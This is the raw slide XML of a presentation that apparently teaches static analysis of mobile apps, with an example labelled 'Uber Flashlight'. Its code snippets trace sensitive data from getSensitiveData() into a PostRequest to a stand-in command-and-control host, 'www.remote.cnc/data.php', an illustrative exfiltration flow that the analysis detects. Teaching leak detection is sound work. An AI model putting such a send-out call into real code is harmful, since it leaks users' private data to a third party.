                <a:gd name="connsiteX1" fmla="*/ 480561 w 480561"/>
                <a:gd name="connsiteY1" fmla="*/ 17798 h 1092385"/>
                <a:gd name="connsiteX2" fmla="*/ 480561 w 480561"/>
                <a:gd name="connsiteY2" fmla="*/ 1092385 h 1092385"/>
                <a:gd name="connsiteX3" fmla="*/ 0 w 480561"/>
                <a:gd name="connsiteY3" fmla="*/ 1092385 h 1092385"/>
                <a:gd name="connsiteX4" fmla="*/ 0 w 480561"/>
                <a:gd name="connsiteY4" fmla="*/ 17798 h 1092385"/>
                <a:gd name="connsiteX0" fmla="*/ 0 w 480561"/>
                <a:gd name="connsiteY0" fmla="*/ 30034 h 1104621"/>
                <a:gd name="connsiteX1" fmla="*/ 480561 w 480561"/>
                <a:gd name="connsiteY1" fmla="*/ 30034 h 1104621"/>
                <a:gd name="connsiteX2" fmla="*/ 480561 w 480561"/>
                <a:gd name="connsiteY2" fmla="*/ 1104621 h 1104621"/>
                <a:gd name="connsiteX3" fmla="*/ 0 w 480561"/>
                <a:gd name="connsiteY3" fmla="*/ 1104621 h 1104621"/>
                <a:gd name="connsiteX4" fmla="*/ 0 w 480561"/>
                <a:gd name="connsiteY4" fmla="*/ 30034 h 1104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0561" h="1104621">
                  <a:moveTo>
                    <a:pt x="0" y="30034"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="160187" y="-10012"/>
                    <a:pt x="320374" y="-10012"/>
                    <a:pt x="480561" y="30034"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="480561" y="1104621"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="1104621"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="3003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/>
                </a:gs>
                <a:gs pos="50500">
                  <a:srgbClr val="FFFFFF">
                    <a:alpha val="19000"/>
                  </a:srgbClr>
                </a:gs>
                <a:gs pos="42000">
                  <a:schemeClr val="bg1">
                    <a:alpha val="27000"/>
                  </a:schemeClr>
                </a:gs>
                <a:gs pos="59000">
                  <a:schemeClr val="bg1">
                    <a:alpha val="23000"/>
                  </a:schemeClr>
                </a:gs>
                <a:gs pos="100000">
                  <a:schemeClr val="tx1"/>
                </a:gs>
              </a:gsLst>
              <a:lin ang="10800000" scaled="0"/>
              <a:tileRect/>
            </a:gradFill>
            <a:ln>
              <a:noFill/>
            </a:ln>
            <a:effectLst>
              <a:glow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3235719" y="4159332"/>
              <a:ext cx="258982" cy="601579"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 29055"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="tx1">
                <a:alpha val="80000"/>
              </a:schemeClr>
            </a:solidFill>
            <a:ln>
              <a:noFill/>
            </a:ln>
            <a:effectLst>
              <a:softEdge rad="0"/>
            </a:effectLst>
            <a:scene3d>
              <a:camera prst="orthographicFront"/>
              <a:lightRig rig="threePt" dir="t"/>
            </a:scene3d>
            <a:sp3d extrusionH="76200" contourW="38100">
              <a:bevelT w="139700" h="139700" prst="divot"/>
              <a:extrusionClr>
                <a:schemeClr val="tx1">
                  <a:lumMod val="50000"/>
                  <a:lumOff val="50000"/>
                </a:schemeClr>
              </a:extrusionClr>
              <a:contourClr>
                <a:schemeClr val="tx1">
                  <a:lumMod val="85000"/>
                  <a:lumOff val="1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3256981" y="4215675"/>
              <a:ext cx="216458" cy="260072"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 26999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50800" h="139700" prst="divot"/>
              <a:extrusionClr>
                <a:schemeClr val="bg1">
                  <a:lumMod val="50000"/>
                </a:schemeClr>
              </a:extrusionClr>
              <a:contourClr>
                <a:schemeClr val="tx1">
                  <a:lumMod val="85000"/>
                  <a:lumOff val="1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66051" y="1468555"/>
              <a:ext cx="2198318" cy="227805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2273471" y="1622597"/>
              <a:ext cx="2185416" cy="173011"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:gradFill>
              <a:gsLst>
                <a:gs pos="49000">
                  <a:srgbClr val="232323"/>
                </a:gs>
                <a:gs pos="0">
                  <a:schemeClr val="dk1">
                    <a:satMod val="103000"/>
                    <a:lumMod val="102000"/>
                    <a:tint val="94000"/>
                  </a:schemeClr>
                </a:gs>
                <a:gs pos="50000">
                  <a:schemeClr val="dk1">
                    <a:satMod val="110000"/>
                    <a:lumMod val="100000"/>
                    <a:shade val="100000"/>
                  </a:schemeClr>
                </a:gs>
                <a:gs pos="100000">
                  <a:schemeClr val="dk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/>
            <a:effectLst>
              <a:outerShdw dist="12700" dir="5400000" algn="t" rotWithShape="0">
                <a:schemeClr val="bg1">
                  <a:alpha val="40000"/>
                </a:scheme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lIns="45720" rtlCol="0" anchor="ctr">
              <a:sp3d extrusionH="6350">
                <a:contourClr>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="50000"/>
                    <a:lumOff val="50000"/>
                  </a:schemeClr>
                </a:contourClr>
              </a:sp3d>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="800" b="1" dirty="0" err="1" smtClean="0">
                  <a:effectLst>
                    <a:outerShdw blurRad="50800" dist="38100" dir="2700000" algn="tl" rotWithShape="0">
                      <a:schemeClr val="bg1">
                        <a:alpha val="40000"/>
                      </a:schemeClr>
                    </a:outerShdw>
                  </a:effectLst>
                  <a:latin typeface="Helvetica Neue Condensed" charset="0"/>
                  <a:ea typeface="Helvetica Neue Condensed" charset="0"/>
                  <a:cs typeface="Helvetica Neue Condensed" charset="0"/>
                </a:rPr>
                <a:t>Uber</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="800" b="1" dirty="0" smtClean="0">
                  <a:effectLst>
                    <a:outerShdw blurRad="50800" dist="38100" dir="2700000" algn="tl" rotWithShape="0">
                      <a:schemeClr val="bg1">
                        <a:alpha val="40000"/>
                      </a:schemeClr>
                    </a:outerShdw>
                  </a:effectLst>
                  <a:latin typeface="Helvetica Neue Condensed" charset="0"/>
                  <a:ea typeface="Helvetica Neue Condensed" charset="0"/>
                  <a:cs typeface="Helvetica Neue Condensed" charset="0"/>
                </a:rPr>
                <a:t> Flashlight</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="800" b="1" dirty="0"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Helvetica Neue Condensed" charset="0"/>
                <a:ea typeface="Helvetica Neue Condensed" charset="0"/>
                <a:cs typeface="Helvetica Neue Condensed" charset="0"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5648088" y="4845540"/>
            <a:ext cx="3343512" cy="68689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Static analysis unpacks </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>the app and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>analyses </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>its code </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>&amp; resources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40932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585200" y="6470773"/>
            <a:ext cx="406400" cy="228600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{6FBB4DF6-A4D6-D143-8127-45F58A411173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125968" name="AutoShape 16"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="941388" y="1765423"/>
            <a:ext cx="7458075" cy="33242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D5D5D5"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="D5D5D5">
                  <a:gamma/>
                  <a:tint val="23922"/>
                  <a:invGamma/>
                </a:srgbClr>
              </a:gs>
            </a:gsLst>
            <a:lin ang="5400000" scaled="1"/>
          </a:gradFill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pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr altLang="en-US" sz="1600" noProof="1">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>// ...</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="2B91AF"/>
                </a:solidFill>
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:endParaRPr altLang="en-US" sz="1600" noProof="1">
              <a:solidFill>
                <a:srgbClr val="292929"/>
              </a:solidFill>
              <a:latin typeface="Courier New" charset="0"/>
              <a:ea typeface="Arial" charset="0"/>
              <a:cs typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr altLang="en-US" sz="1600" noProof="1">
                <a:solidFill>
                  <a:srgbClr val="2B91AF"/>
                </a:solidFill>
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>String</a:t>
            </a:r>
            <a:r>
              <a:rPr altLang="en-US" sz="1600" noProof="1">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" noProof="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="292929"/>
                </a:solidFill>
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>deviceName</a:t>
            </a:r>
            <a:r>
              <a:rPr altLang="en-US" sz="1600" noProof="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="292929"/>
                </a:solidFill>
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr altLang="en-US" sz="1600" noProof="1">
                <a:solidFill>
                  <a:srgbClr val="292929"/>
                </a:solidFill>
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>= </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" noProof="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="292929"/>
                </a:solidFill>
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>getDeviceName();</a:t>
            </a:r>
            <a:endParaRPr altLang="en-US" sz="1600" noProof="1" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="292929"/>
              </a:solidFill>
              <a:latin typeface="Courier New" charset="0"/>
              <a:ea typeface="Arial" charset="0"/>
              <a:cs typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1600" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="008000"/>
              </a:solidFill>
              <a:latin typeface="Courier New" charset="0"/>
              <a:ea typeface="Arial" charset="0"/>
              <a:cs typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr altLang="en-US" sz="1600" noProof="1">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>// ...	</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="2B91AF"/>
                </a:solidFill>
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1600" dirty="0">
              <a:solidFill>
                <a:srgbClr val="292929"/>
              </a:solidFill>
              <a:latin typeface="Courier New" charset="0"/>
              <a:ea typeface="Arial" charset="0"/>
              <a:cs typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A31515"/>
                </a:solidFill>
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="A31515"/>
                </a:solidFill>
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>"&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" noProof="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="A31515"/>
                </a:solidFill>
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>senesitiveData</a:t>
            </a:r>
            <a:r>
              <a:rPr altLang="en-US" sz="1600" noProof="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="A31515"/>
                </a:solidFill>
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" noProof="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="A31515"/>
                </a:solidFill>
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" noProof="1">
                <a:solidFill>
                  <a:srgbClr val="A31515"/>
                </a:solidFill>
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" noProof="1">
                <a:solidFill>
                  <a:srgbClr val="292929"/>
                </a:solidFill>
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>+</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" noProof="1">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t> data</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1600" noProof="1" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="292929"/>
              </a:solidFill>
              <a:latin typeface="Courier New" charset="0"/>
              <a:ea typeface="Arial" charset="0"/>
              <a:cs typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr altLang="en-US" sz="1600" noProof="1">
              <a:solidFill>
                <a:srgbClr val="292929"/>
              </a:solidFill>
              <a:latin typeface="Courier New" charset="0"/>
              <a:ea typeface="Arial" charset="0"/>
              <a:cs typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr altLang="en-US" sz="1600" noProof="1">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1600" dirty="0">
              <a:latin typeface="Courier New" charset="0"/>
              <a:ea typeface="Arial" charset="0"/>
              <a:cs typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr altLang="en-US" sz="1600" noProof="1">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>// ...</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="2B91AF"/>
                </a:solidFill>
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="16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5965" name="AutoShape 13"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1143000" y="1457448"/>
            <a:ext cx="6553200" cy="5334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91B6DB"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="91B6DB">
                  <a:gamma/>
                  <a:tint val="80000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r>
              <a:rPr altLang="en-US" sz="1600" noProof="1">
                <a:solidFill>
                  <a:srgbClr val="292929"/>
                </a:solidFill>
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>String </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" noProof="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="292929"/>
                </a:solidFill>
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>data </a:t>
            </a:r>
            <a:r>
              <a:rPr altLang="en-US" sz="1600" noProof="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="292929"/>
                </a:solidFill>
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>= get</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" noProof="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="292929"/>
                </a:solidFill>
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>SensitiveData</a:t>
            </a:r>
            <a:r>
              <a:rPr altLang="en-US" noProof="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="292929"/>
                </a:solidFill>
              </a:rPr>
              <a:t>()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="292929"/>
                </a:solidFill>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
            <a:endParaRPr altLang="en-US" sz="1600" noProof="1">
              <a:solidFill>
                <a:srgbClr val="A31515"/>
              </a:solidFill>
              <a:latin typeface="Courier New" charset="0"/>
              <a:ea typeface="Arial" charset="0"/>
              <a:cs typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="125966" name="AutoShape 14"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1524000" y="3743448"/>
            <a:ext cx="6019800" cy="5334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91B6DB"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="91B6DB">
                  <a:gamma/>
                  <a:tint val="80000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altLang="en-US" sz="1600" noProof="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="292929"/>
                </a:solidFill>
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>String </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" noProof="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="292929"/>
                </a:solidFill>
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>data2 </a:t>
            </a:r>
            <a:r>
              <a:rPr altLang="en-US" sz="1600" noProof="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="292929"/>
                </a:solidFill>
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>= </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" noProof="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="A31515"/>
                </a:solidFill>
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>……………………………………………………</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" noProof="1">
                <a:solidFill>
                  <a:srgbClr val="A31515"/>
                </a:solidFill>
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>…</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" noProof="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="A31515"/>
                </a:solidFill>
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" noProof="1">
                <a:solidFill>
                  <a:srgbClr val="292929"/>
                </a:solidFill>
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>+</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" noProof="1">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t> data</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1600" dirty="0">
              <a:solidFill>
                <a:srgbClr val="292929"/>
              </a:solidFill>
              <a:latin typeface="Courier New" charset="0"/>
              <a:ea typeface="Arial" charset="0"/>
              <a:cs typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="125967" name="AutoShape 15"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2133600" y="4962648"/>
            <a:ext cx="6742176" cy="5334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DB9191"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="DB9191">
                  <a:gamma/>
                  <a:tint val="80000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1600" noProof="1">
                <a:solidFill>
                  <a:srgbClr val="292929"/>
                </a:solidFill>
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>PostRequest("</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" noProof="1">
                <a:solidFill>
                  <a:srgbClr val="292929"/>
                </a:solidFill>
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0033CC"/>
                </a:solidFill>
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="Courier New" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>www.remote.cnc/data.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="292929"/>
                </a:solidFill>
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>", </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="292929"/>
                </a:solidFill>
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>data2);</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1600" dirty="0">
              <a:solidFill>
                <a:srgbClr val="292929"/>
              </a:solidFill>
              <a:latin typeface="Courier New" charset="0"/>
              <a:ea typeface="Arial" charset="0"/>
              <a:cs typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="125969" name="Text Box 17"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1349375" y="2162298"/>
            <a:ext cx="7696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3333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altLang="en-US" sz="1600" noProof="1">
                <a:solidFill>
                  <a:srgbClr val="2B91AF"/>
                </a:solidFill>
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>String</a:t>
            </a:r>
            <a:r>
              <a:rPr altLang="en-US" sz="1600" noProof="1">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" noProof="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="292929"/>
                </a:solidFill>
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>data </a:t>
            </a:r>
            <a:r>
              <a:rPr altLang="en-US" sz="1600" noProof="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="292929"/>
                </a:solidFill>
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>= </a:t>
